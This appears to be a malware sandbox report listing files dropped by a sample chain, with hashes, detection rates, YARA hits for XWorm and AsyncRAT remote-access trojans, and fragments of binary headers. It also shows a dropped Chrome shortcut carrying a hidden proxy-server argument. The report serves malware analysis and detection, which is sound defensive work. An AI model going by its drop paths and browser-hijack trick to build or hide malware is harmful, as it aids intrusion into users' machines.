Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..H............... .....@..... ....................................`...@......@............... ..................................n............................................................................................ ..H............text....G... ...H.................. ..`.rsrc...n............J..............@..@........................................H.......d[..x...........................................................8.#G..d..P.6.>..(.....=#..U...Ri..D.......H.x..7.z.)V.?2..t..s....A]..4..rI0 P..h.s.u...;P......u...7....g....`........D..a..p.......nRa+5.ux.r....!6...}...{...A.6.9../W8..'...e...U\|.x+Tq...7+9G.t.....=...J....E[.._.....MX.....!@9..6.]..A.....t{."V.i...%..-.Ld$....q.....-..x.b.^}3:c_.D..k^....~.48A.u.R..dc.l....o.<. ...P.X...$H..vN.2...?y6.~Y."..3..............W.....CH'...;.... Ff......C.H.

C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	5.97238192300277
Encrypted:	false
SSDEEP:	1536:1z8H8uTSHKoKlDeE0C3shB1ueVby8EXEFA4Xib6TWcgMfAOISZsw61EmS:+c/q/l6EP3mvuwby8EXuhX6cgXOI0stE
MD5:	DB5717FD494495EEA3C8F7D4AB29D6B0
SHA1:	39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559
SHA-256:	6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
SHA-512:	B16C7BFFC8418A0349E5189D61439DF325D2AB33A42C720380A305DECDE00348F83D96B6C263A95DC253128EB0E47B1A3DC96F8F115DA868FF9227B9A40882DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84%
Joe Sandbox View:	Filename: setup.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.2935.18945.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.f.................n............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H........g..H%......&.....................................................(.....r...p. ......(.....rC..p.s.........s.........s.........s..........rg..p. g.h..r...p. r....r/..p. .....r...p. p{..r...p. ..?...((....r...p. ....r...p. S....(+...-.(,...,.+.(-...,.+.(...,.+.()...,..(Z..."(....+."(....+.&(9...&+..+5sk... .... .'..ol...(,...~....-.(b...(T...~....om...&.-..ra..p. .....r...p. .y4..r)..p. E/...r...p.r...p.rU..p.r...p. ..'..r...p.

C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	104448
Entropy (8bit):	4.851224245014386
Encrypted:	false
SSDEEP:	3072:pbqQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQQQQQQQQQQQQQQxQQQQQQQQQjQQQQQQQ3:5qQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQ+
MD5:	771B8E84BA4F0215298D9DADFE5A10BF
SHA1:	0F5E4C440CD2E7B7D97723424BA9C56339036151
SHA-256:	3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0
SHA-512:	2814EF23653C9BE5F5E7245AF291CF330C355ED12B4DB76F71B4DE699C67A9FFD1BDC0CC1DF5352335B57AB920404B9C8E81CD9257527264BDE4F72A53700164
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q................0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......Ph..lD..........................................................C........s..Q....sECbF.h..o....e?.+.x.28+.{u.)..y....-i.$.n. y....R`..}...........ds.g..0._e#....&...K......._..\|l.d.z..........6..>...M...!.a..c.k.......%.......1..o.........F.b.."............cz...)..cg.-@.w.....4..M4...@8....M..dO..\|z..Zca...69.......................................................................CC.........6....6....................................................8..8.

C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.82790978214397
Encrypted:	false
SSDEEP:	3:qIJMyAWRwo8n:q0CWRH8n
MD5:	0B7D0E3C4F447BCF36DCA919DFEF1607
SHA1:	17C3A0B1A4773EC4F168CDC24904B792FADC8F2E
SHA-256:	4F8F4E089917FBCCFC43593222BF9B17E43EDD9CD4BEF59B9152D4F8239C798D
SHA-512:	E6B37EB4F155A6F6F812721E97DB4CECDCBFEFE63C3F370E35D03CF20B858C08AAE82AFAD09043C55FF047A895827716D3003EE35A8C6D8B0724AB0CB4AC1B97
Malicious:	false
Preview:	Invalid request header.

C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	96256
Entropy (8bit):	5.97238192300277
Encrypted:	false
SSDEEP:	1536:1z8H8uTSHKoKlDeE0C3shB1ueVby8EXEFA4Xib6TWcgMfAOISZsw61EmS:+c/q/l6EP3mvuwby8EXuhX6cgXOI0stE
MD5:	DB5717FD494495EEA3C8F7D4AB29D6B0
SHA1:	39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559
SHA-256:	6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
SHA-512:	B16C7BFFC8418A0349E5189D61439DF325D2AB33A42C720380A305DECDE00348F83D96B6C263A95DC253128EB0E47B1A3DC96F8F115DA868FF9227B9A40882DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.f.................n............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H........g..H%......&.....................................................(.....r...p. ......(.....rC..p.s.........s.........s.........s..........rg..p. g.h..r...p. r....r/..p. .....r...p. p{..r...p. ..?...((....r...p. ....r...p. S....(+...-.(,...,.+.(-...,.+.(...,.+.()...,..(Z..."(....+."(....+.&(9...&+..+5sk... .... .'..ol...(,...~....-.(b...(T...~....om...&.-..ra..p. .....r...p. .y4..r)..p. E/...r...p.r...p.rU..p.r...p. ..'..r...p.

C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	675840
Entropy (8bit):	7.998216130139266
Encrypted:	true
SSDEEP:	12288:nQZ3hb7F0Rz5oquPojKv3rLMmVIhF2nde4S9MQfh0/Al2B4KtFejEqhPBBl0:G8zOFPOKzLM0k4dQf2B1E4q5Bs
MD5:	8083FED730E151BF47528621DB8E7FF8
SHA1:	4AB5E2EB5C6326FD68704CDC5A4F719D332F51A6
SHA-256:	AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
SHA-512:	A36F22356558565A90107F3618D9D9AC8A20DA73616AA97A87D3EA41C8F444847A6BB56856FEAE87A1CA5C6CC748BF6CE1C43D5E348DD9EA80CDD3C3DBD0D47B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..H............... .....@..... ....................................`...@......@............... ..................................n............................................................................................ ..H............text....G... ...H.................. ..`.rsrc...n............J..............@..@........................................H.......d[..x...........................................................8.#G..d..P.6.>..(.....=#..U...Ri..D.......H.x..7.z.)V.?2..t..s....A]..4..rI0 P..h.s.u...;P......u...7....g....`........D..a..p.......nRa+5.ux.r....!6...}...{...A.6.9../W8..'...e...U\|.x+Tq...7+9G.t.....=...J....E[.._.....MX.....!@9..6.]..A.....t{."V.i...%..-.Ld$....q.....-..x.b.^}3:c_.D..k^....~.48A.u.R..dc.l....o.<. ...P.X...$H..vN.2...?y6.~Y."..3..............W.....CH'...;.... Ff......C.H.

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:54 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.4508019039178133
Encrypted:	false
SSDEEP:	48:8Sarl2dfTXd3RYrnvPdAKRkdAGdAKRFdAKRE:8SarlOw
MD5:	39DE4D465FAF69FE74B81A9383AE84D5
SHA1:	42C6F26F955BED80484D9D524925A00886544E18
SHA-256:	2846CF5DAF4E75FE7320A09459020CC71AB5CDD03A4FD280091C4DDEEA585E1E
SHA-512:	B41BF70EBD057E0DCCA8937661BB4C5F192789B19A0C703D705F31A8F713651876476688E753E6EEB270E605357FAE080EA8AB82F04F712E0294403BB17F9EC9
Malicious:	false
Preview:	L..................F.@.. ......,....2.]m.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GOLD.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypteda.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1414800
Entropy (8bit):	7.827189910944366
Encrypted:	false
SSDEEP:	24576:UzZ1Futzu9df939+wlQ+u6M6NrPLyPts+5+OgoSsKWF5DcJ14lWCqMYDe1EpmqIu:UvF4a9d9tnlQ+u96NyPtP5+1GKWF5gzn
MD5:	DB2A12EDC73769F2F2B6B01545AFE2C3
SHA1:	73DC44FB0753296F51B851299F468031CEB77B54
SHA-256:	E6DB7D34B498982601B2C45AC5B2A1C1B9502E502514CCFFAE9862F2AA719F42
SHA-512:	DADF36BC9C5D88C28B9064892CC263C912CE668435B71802DF756C0A4E680F8407011D36498A2511DDA7165AEA866C0AE794F9EC8FBCC42C7DA1661399316CE4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.ydx..7x..7x..7_Hz7{..7_Hl7i..7x..7..7q..7s..7q..7y..7q..7y..7Richx..7........................PE..L....l.K.................h...@...B...4............@..................................................................................................................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata...................................rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	4.851224245014386
Encrypted:	false
SSDEEP:	3072:pbqQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQQQQQQQQQQQQQQxQQQQQQQQQjQQQQQQQ3:5qQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQ+
MD5:	771B8E84BA4F0215298D9DADFE5A10BF
SHA1:	0F5E4C440CD2E7B7D97723424BA9C56339036151
SHA-256:	3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0
SHA-512:	2814EF23653C9BE5F5E7245AF291CF330C355ED12B4DB76F71B4DE699C67A9FFD1BDC0CC1DF5352335B57AB920404B9C8E81CD9257527264BDE4F72A53700164
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q................0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......Ph..lD..........................................................C........s..Q....sECbF.h..o....e?.+.x.28+.{u.)..y....-i.$.n. y....R`..}...........ds.g..0._e#....&...K......._..\|l.d.z..........6..>...M...!.a..c.k.......%.......1..o.........F.b.."............cz...)..cg.-@.w.....4..M4...@8....M..dO..\|z..Zca...69.......................................................................CC.........6....6....................................................8..8.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1104936
Entropy (8bit):	7.998181628509962
Encrypted:	true
SSDEEP:	24576:lxaesWtTVxFP96Hu0jjjfQNggJRhc2BIVTit:3FsWTzqjjW/BV
MD5:	8E74497AFF3B9D2DDB7E7F819DFC69BA
SHA1:	1D18154C206083EAD2D30995CE2847CBEB6CDBC1
SHA-256:	D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
SHA-512:	9AACC5C130290A72F1087DAA9E79984565CCAB6DBCAD5114BFED0919812B9BA5F8DEE9C37D230EECA4DF3CCA47BA0B355FBF49353E53F10F0EBC266E93F49F97
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f................................. ........@.. ....................... ............`.....................................O.......................(&........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........................................................................L.v.lT.p#.E..'&..@cC...tE.....% ...pr*QA.U.v6..V.=.Cx..G.H.E.....i.....(hh.q.Bf..}...gL-.S.1),p.....$.8.ij3.....7....!Ts......T.[...X..PUE.c.j...s.].E........q.X.wsS.Y....g)......7I...OK..m(..d.(.T........0`.V`...o....E.G...#.I..q.....lh9..+........>6Q..=.S ...........-....#..].......rA.R..........1?.[..}l....jqD.$....N..xE1p....x[.h~.....i..d...u.!x.o..D..yue...S../z..>.\|.!. .0.^.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	330792
Entropy (8bit):	7.984907013196583
Encrypted:	false
SSDEEP:	6144:kImw3mswWc3KcEUffTOR/PmB7ZegrbgykDDCT2qDx0j6ibCMvUkBEO:k+wWcXbwmfXK62qSjPbkkBEO
MD5:	D6FCA3CD57293390CCF9D2BC83662DDA
SHA1:	94496D01AA91E981846299EEAC5631AB8B8C4A93
SHA-256:	74E0BF30C9107FA716920C878521037DB3CA4EEDA5C14D745A2459EB14D1190E
SHA-512:	3990A61000C7DAD33E75CE1CA670F5A7B66C0CE1215997DCCFCA5D4163FEDFC7B736BCA01C2F1064B0C780ECCB039DD0DE6BE001C87399C1D69DA0F456DB2A8E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@............`.....................................S.......................(&... ......p................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.........................................................................#...t..j. `t-...z.....-....r.N..e.k..MXw..a.bj......#.O...1..$....OU.........]AM...K!].,..Z........w...R...^#.U..(.Q.D}z......m..._.. ".!..z.#.79...y.Y.2......lc...5..>.l...[..W.I.C......9...FkJ..}.X_X."...qP.4...p.X"..d6.&....\...a...]".Tv>.@..GIc.4...P....J..zj.pr.y.r..fH...6.......#.....kqzT+.S....0.A..p.1.....f..\|.P.#.XX..m......+p.:.+...q.....#X...},nh.L.N.'.,..0\|:.r.E.3..%Y..u

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	492544
Entropy (8bit):	6.391116117275591
Encrypted:	false
SSDEEP:	12288:UHdftnB3Zp+52J9+62HHLhJ3er8XSwW0:UNz3ZwwJ9+7HFnXP
MD5:	F9A4F6684D1BF48406A42921AEBC1596
SHA1:	C9186FF53DE4724EDE20C6485136B4B2072BB6A6
SHA-256:	E0A051F93D4C1E81CC142181D14249E246BE4C169645D667267134B664E75042
SHA-512:	67294A47DFEF6ABA404939497C403F93318841E9C5EE28B706F7506B5DFF2630381E28E86F6DCBFDFF2427092A515DB1DC0A04E334E7F8DE8B0B682269FF88FD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..J...J...J...<...J...<#..J...<...J...2...J...J...J...<...J...<'..J...< ..J..Rich.J..................PE..L.....jd.....................NA......K............@...........................F.....i"..........................................d.....D.H...........................p....................... 7.......6..@............................................text............................... ..`.data.....?......\|..................@....rsrc...H.....D......n..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6646953
Entropy (8bit):	6.633823221893971
Encrypted:	false
SSDEEP:	49152:P2OI2oMyZ4NG02ebe3l7i0s1Nc9blH6xzR1CcLPGj8kiaWOJfuYuCvAHZ+WcfZgJ:jJbiHlHOR1CcLPGj8kiaW98XqVyWPt
MD5:	F4C78D18C5B5CB531C897F23CF3D3FED
SHA1:	5C0F3D158F3A4DE86AB0C811CDD945236AFD4740
SHA-256:	4553D0B891772C5170F9E840AE21F514C50C92636462A1BC785E536857456321
SHA-512:	705A256CE81E6F9C62CD8D3230492FA46BA70F829A0480794CC968C2B53E5EA940482D9E710DCF4B7AB3D1E8281995E6FBA9D309F60FF01689A85E2324E7D995
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f..^.)&.........#..G..PZ...f...........G...@.................................Y.f....... ......................0..B....@...............................p..D$..........................dzH......................A...............................text....G.......G.................`.P`.data.........G.......G.............@.`..rdata..x.....G.......G.............@.`@/4............H......tH.............@.0@.bss......f..@L.......................`..edata..B....0....... L.............@.0@.idata.......@......."L.............@.0..CRT....4....P.......,L.............@.0..tls.........`........L.............@.0..reloc..D$...p...&...0L.............@.0B/14..................VZ.............@..B/29.................^Z.............@..B/41.....XL...`...N....\.............@..B/55.....B............T\.............@..B/67.....T............8].............@.0B/80.....a............V].

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2846145
Entropy (8bit):	6.162330655717327
Encrypted:	false
SSDEEP:	49152:kpiVaJ9m+8FdK1BZKVD2CMwbbIip7q18N/jH1:ks3+11vKV7Fs89jH1
MD5:	FD2DEFC436FC7960D6501A01C91D893E
SHA1:	5FAA092857C3C892EAB49E7C0E5AC12D50BCE506
SHA-256:	BA13DA01C41FA50EC5E340061973BC912B1F41CD1F96A7CAE5D40AFC00FF7945
SHA-512:	9A3E1F2DC5104D8636DC27AF4C0F46BDB153FCFADA98831B5AF95EEB09BB7EF3C7E19927D8F06884A6837E10889380645B6138644F0C08B9CB2E59453041EC42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...NF.f..$."&.........#.....B ..x`...............@...................................,....... .........................B.......................................`5..........................dX.......................................................text...............................`.P`.data...............................@.`..rdata..X...........................@.`@/4......8....p.......L..............@.0@.bss.....w`..0........................`..edata..B...........................@.0@.idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..`5.......6..................@.0B/14.....p....0.......H .............@..B/29..........@.......P .............@..B/41......K.......L....!.............@..B/55..........@.......B".............@..B/67..... ....0.......&#.............@.0B/80.....Q....P.......D#.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6663286
Entropy (8bit):	6.633833679677087
Encrypted:	false
SSDEEP:	98304:LMx3VZorofxDRAwXHf39g5MrvketaC+sbUefI:iFISthXf9gKrr1pfI
MD5:	F9E43AEFFF1576AA7ADFC1688D5A24BF
SHA1:	9ACBCA30ABA919B26F1439668EBDB1B6A38E46EA
SHA-256:	B1FCE873959EE7296C5D7307FC3E4302BC013C8DDCE57EE77708A94E4416653A
SHA-512:	69D35C334B4670BDA9E6045738CD6779E16EC2C712CC98FD2FA595829A7D78F62739C59EFACA61D4BC190F0A60D722A283F2046276338125D70545D679EE1532
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.2_.S&.........#..G...Z...f...........G...@...................................f....... ......................`..B....p..................................$.............................H......................q...............................text.....G.......G.................`.P`.data.........G.......G.............@.`..rdata........H.......G.............@.`@/4......<.....H.......H.............@.0@.bss....T.f..pL.......................`..edata..B....`.......JL.............@.0@.idata.......p.......LL.............@.0..CRT....4............VL.............@.0..tls.................XL.............@.0..reloc..$........0...ZL.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL.......N...:\.............@..B/55.....B.............\.............@..B/67.....T............l].............@.0B/80.....a.............].

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
